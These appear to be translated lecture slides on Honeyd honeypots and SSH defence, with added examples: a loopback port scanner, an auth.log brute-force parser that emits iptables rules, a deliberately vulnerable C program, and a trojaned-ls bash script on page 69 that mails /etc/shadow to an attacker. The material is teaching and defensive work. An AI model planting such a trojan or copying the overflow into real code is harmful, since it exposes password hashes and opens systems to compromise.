With -P0 (skip host discovery; spelled -Pn in current Nmap versions) three more hosts are scanned at almost no extra cost: hosts that do not answer the discovery probes are otherwise assumed to be down and skipped
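The three port states on page 53 map directly onto what a TCP connect scan observes from the socket API, which is what makes the connect technique the easiest to reason about. The following is an added example, not code from the slides or from Nmap: a minimal connect scanner that labels each port open, closed or filtered from the connect() outcome. To run offline it starts a throwaway listener on 127.0.0.1 (so one port is genuinely open) and picks a just-released port (so one is closed); "filtered" requires a host that silently drops SYNs, which loopback cannot demonstrate, so it is only reachable through the timeout branch. The timeout value and port selection are choices made for the example.

```python
# Added example (not code from the slides): a TCP connect scan that maps the
# socket outcome onto the three port states defined above. To run offline it
# opens a throwaway listener on 127.0.0.1, so one port is genuinely open and a
# just-released port is closed; "filtered" needs a host that silently drops
# SYNs, which loopback cannot show.
import socket
import threading


def scan_port(host, port, timeout=0.5):
    """One connect() = one full three-way handshake if the port is open."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
        return "open"            # SYN/ACK received: a service is listening
    except socket.timeout:
        return "filtered"        # nothing came back: dropped on the way
    except ConnectionRefusedError:
        return "closed"          # RST received: host is up, nothing listening
    except OSError:
        return "filtered"        # e.g. ICMP unreachable: treat like a filter
    finally:
        s.close()


def connect_scan(host, ports, timeout=0.5):
    return {port: scan_port(host, port, timeout) for port in ports}


def start_listener():
    """Bind to port 0 so the kernel picks a free port; accept and drop clients."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        try:
            while True:
                client, _ = srv.accept()
                client.close()
        except OSError:
            pass                 # listener closed: stop serving

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]


def free_port():
    """A port that was free a moment ago, so a connect to it should be refused."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port


def demo():
    srv, open_port = start_listener()
    closed_port = free_port()
    try:
        result = connect_scan("127.0.0.1", [open_port, closed_port])
    finally:
        srv.close()
    return result[open_port], result[closed_port]


if __name__ == "__main__":
    print(demo())                # ('open', 'closed')
```

Because every probe completes the handshake, the listener's accept() fires for each open port: that is exactly the footprint that shows up in the service's own log (and in honeyd's S/E records), and the reason SYN scans are preferred for stealth when raw sockets are available.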

Page 57: Using Honeypots with Honeyd

Attack

Brute force / dictionaries

Exploitation of vulnerabilities

Page 58: Using Honeypots with Honeyd

SSH

Port 22

Attacked by brute force / dictionaries

cat /var/log/auth.log

Page 59: Using Honeypots with Honeyd

SSH - log

Dec 24 01:24:46 golden-laptop sshd[23906]: Invalid user oracle from 89.235.152.18
Dec 24 01:24:46 golden-laptop sshd[23906]: pam_unix(ssh:auth): check pass; user unknown
Dec 24 01:24:46 golden-laptop sshd[23906]: pam_unix(ssh:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=89.235.152.18
Dec 24 01:24:48 golden-laptop sshd[23906]: Failed password for invalid user oracle from 89.235.152.18 port 48785 ssh2
Dec 24 01:24:49 golden-laptop sshd[23908]: reverse mapping checking getaddrinfo for 89-235-152-18.adsl.sta.mcn.ru [89.235.152.18] failed - POSSIBLE BREAK-IN ATTEMPT!
Dec 24 01:26:01 golden-laptop sshd[23963]: Invalid user test from 89.235.152.18
Dec 24 01:26:01 golden-laptop sshd[23963]: pam_unix(ssh:auth): check pass; user unknown
Dec 24 01:26:01 golden-laptop sshd[23963]: pam_unix(ssh:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=89.235.152.18
Dec 24 01:26:04 golden-laptop sshd[23963]: Failed password for invalid user test from 89.235.152.18 port 57886 ssh2
Dec 24 01:26:05 golden-laptop sshd[23965]: reverse mapping checking getaddrinfo for 89-235-152-18.adsl.sta.mcn.ru [89.235.152.18] failed - POSSIBLE BREAK-IN ATTEMPT!
Dec 24 01:26:21 golden-laptop sshd[23975]: Invalid user cvsuser from 89.235.152.18
Dec 24 01:26:21 golden-laptop sshd[23975]: pam_unix(ssh:auth): check pass; user unknown
Dec 24 01:26:21 golden-laptop sshd[23975]: pam_unix(ssh:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=89.235.152.18
Dec 24 01:26:22 golden-laptop sshd[23975]: Failed password for invalid user cvsuser from 89.235.152.18 port 59883 ssh2
Dec 24 01:26:24 golden-laptop sshd[23977]: reverse mapping checking getaddrinfo for 89-235-152-18.adsl.sta.mcn.ru [89.235.152.18] failed - POSSIBLE BREAK-IN ATTEMPT!

Three account names (oracle, test, cvsuser) from the same address within two minutes: a dictionary attack against usernames that do not exist on the host. The "reverse mapping checking ... failed" line only means the address's PTR record does not resolve back to the same address; it is noisy on consumer connections and is not evidence of an attack by itself.
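Picking the repeat offenders out of auth.log and feeding them to the first defence listed on the next page (iptables) is a few lines of parsing. The following is an added example, not code from the slides: it counts failed logins and the usernames tried per source in the sshd log format shown above, lists the sources over a threshold, and emits iptables rules for them next to a rate-limit pair that needs no list at all. SAMPLE is constructed from the slide's lines plus two constructed lines for a legitimate account; the threshold of 3 and the rule set are choices made for the example, not something sshd provides.

```python
# Added example (not code from the slides): summarise sshd failures from
# /var/log/auth.log in the format shown above and turn repeat offenders into
# iptables rules (the first defence on the next slide). SAMPLE is constructed
# from the slide's lines; the threshold and the rule set are choices, not sshd's.
import re
from collections import Counter, defaultdict

FAILED_RE = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+"
)
REVERSE_RE = re.compile(r"reverse mapping checking getaddrinfo for \S+ \[(?P<ip>[\d.]+)\] failed")

SAMPLE = """\
Dec 24 01:24:46 golden-laptop sshd[23906]: Invalid user oracle from 89.235.152.18
Dec 24 01:24:48 golden-laptop sshd[23906]: Failed password for invalid user oracle from 89.235.152.18 port 48785 ssh2
Dec 24 01:24:49 golden-laptop sshd[23908]: reverse mapping checking getaddrinfo for 89-235-152-18.adsl.sta.mcn.ru [89.235.152.18] failed - POSSIBLE BREAK-IN ATTEMPT!
Dec 24 01:26:04 golden-laptop sshd[23963]: Failed password for invalid user test from 89.235.152.18 port 57886 ssh2
Dec 24 01:26:22 golden-laptop sshd[23975]: Failed password for invalid user cvsuser from 89.235.152.18 port 59883 ssh2
Dec 24 01:30:00 golden-laptop sshd[24001]: Failed password for golden from 192.168.100.7 port 40000 ssh2
Dec 24 01:30:05 golden-laptop sshd[24003]: Accepted publickey for golden from 192.168.100.7 port 40002 ssh2
"""

# Rate-limit new SSH connections per source (4 in 60 s) with iptables' "recent"
# module: slows every dictionary attack down without maintaining a block list.
RATE_LIMIT_RULES = [
    "iptables -A INPUT -p tcp --dport 22 -m state --state NEW -m recent --set",
    "iptables -A INPUT -p tcp --dport 22 -m state --state NEW -m recent "
    "--update --seconds 60 --hitcount 4 -j DROP",
]


def analyse(text):
    """Failed logins per source, usernames tried per source, and sources whose
    reverse DNS did not match (informational only: not an attack by itself)."""
    failed = Counter()
    users = defaultdict(Counter)
    bad_rdns = set()
    for line in text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            failed[m.group("ip")] += 1
            users[m.group("ip")][m.group("user")] += 1
            continue
        m = REVERSE_RE.search(line)
        if m:
            bad_rdns.add(m.group("ip"))
    return failed, {ip: dict(c) for ip, c in users.items()}, bad_rdns


def block_candidates(text, threshold=3):
    """Sources with at least `threshold` failed logins (threshold is arbitrary)."""
    failed, _, _ = analyse(text)
    return sorted(ip for ip, n in failed.items() if n >= threshold)


def block_rules(ips):
    return [f"iptables -A INPUT -s {ip} -p tcp --dport 22 -j DROP" for ip in ips]


if __name__ == "__main__":
    for rule in RATE_LIMIT_RULES + block_rules(block_candidates(SAMPLE)):
        print(rule)
```

A single failure from the legitimate user stays below the threshold, which is the point of counting per source rather than reacting to every "Failed password" line; the rate-limit pair is what actually stops the attack in progress, since a block list compiled from the log is always one batch of guesses behind.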

Page 60: Using Honeypots with Honeyd

SSH

Defence:

iptables (filter or rate-limit connections to port 22)

Stronger passwords

RSA (public-key) authentication

Page 61: Using Honeypots with Honeyd

SSH

Password of at least 8 characters (the 2008 guidance; longer passphrases are cheap and strictly better)

Non-trivial passwords (nothing a dictionary would contain)

Alphanumeric combinations with symbols

Mnemonic: "Um Whiskey-Cola vale 3 euros no BA!" ("A whiskey and coke costs 3 euros at the BA!") = "UW-Cv3enBA!"

Page 62: Using Honeypots with Honeyd

SSH

http://www.passwordmeter.com/

Page 63: Using Honeypots with Honeyd

SSH - RSA authentication

1 Generate the key pair with "ssh-keygen -t rsa". This creates ~/.ssh/id_rsa (private key) and ~/.ssh/id_rsa.pub (public key).

2 On every machine we want to connect to (destination), append the generated id_rsa.pub to ~/.ssh/authorized_keys, for example: "cat id_rsa.pub >> ~/.ssh/authorized_keys".

3 On every machine we connect from (origin), place id_rsa in ~/.ssh/ (readable only by its owner, mode 0600; the ssh client refuses to use a private key with looser permissions).

4 Finally, disable password-based login by adding the line "PasswordAuthentication no" to /etc/ssh/sshd_config (on systems that authenticate through PAM also set "ChallengeResponseAuthentication no", otherwise a password can still be entered via keyboard-interactive authentication) and restart the "sshd" daemon with "/etc/init.d/sshd restart". Verify a key-based login from a second session before closing the one you are editing from.

Page 64: Using Honeypots with Honeyd

Vulnerabilities

Behaviour that was not foreseen in a software artefact

Buffer overflow

Unvalidated input

SQL injection

Page 65: Using Honeypots with Honeyd

Exploiting vulnerabilities

Exploit

The name given to a piece of code that exploits flaws in applications so as to cause behaviour in them that was not anticipated.

/* exploit.c: deliberately vulnerable, as on the slides.
 * - strcpy() copies argv[1] into a 10-byte stack buffer with no length
 *   check: a stack buffer overflow.
 * - printf(buffer) passes attacker-controlled data as the format string,
 *   a second, independent bug (%x/%n in argv[1] read or write memory). */
#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[]) {
    char buffer[10];
    strcpy(buffer, argv[1]);
    printf(buffer);
    return 0;
}

Page 66: Using Honeypots with Honeyd

Buffer overflow

user@honeypot:~$ gcc exploit.c -o exploit
user@honeypot:~$ ./exploit thisisanexploit
*** stack smashing detected ***: ./exploit terminated
thisisanexploitAborted

One of gcc's defence mechanisms: the stack protector (-fstack-protector, enabled by default in Ubuntu's gcc) places a canary between the buffer and the saved return address and checks it when main returns. The 16-byte argument (15 characters plus the terminating NUL) overwrote the canary, so the program aborts instead of returning to an attacker-chosen address. Note that the argument is still echoed: the check runs only at function exit, after the overflowed buffer has already been used.

Page 67: Using Honeypots with Honeyd

Shellcode

A set of instructions (in machine code or otherwise) written so that they can be injected into an application at run time.

Illegal access to memory the program was not meant to reach

Injection of the shellcode (for example through the overflowed buffer above, with the saved return address redirected to it)

Page 68: Using Honeypots with Honeyd

Rootkits

Set of malicious programs (trojans, backdoors, ...)

chkrootkit and rkhunter (Linux)1;

RootkitRevealer (Windows).

1 Both available from Ubuntu's package manager.

Page 69: Using Honeypots with Honeyd

Trojaned ls

#!/bin/bash
# Replace /bin/ls with a wrapper that mails the password hashes to the
# attacker and then runs the real ls, kept as /bin/ls.old.
mv /bin/ls /bin/ls.old
/bin/echo "cat /etc/shadow | mail [email protected]" > /bin/ls
/bin/echo "/bin/ls.old" >> /bin/ls
chmod +x /bin/ls

Illustration only (it needs root and does not even pass ls its arguments), but it shows why the rootkit checkers above compare system binaries against known-good checksums rather than trusting their output.

Page 70: Using Honeypots with Honeyd

Conclusion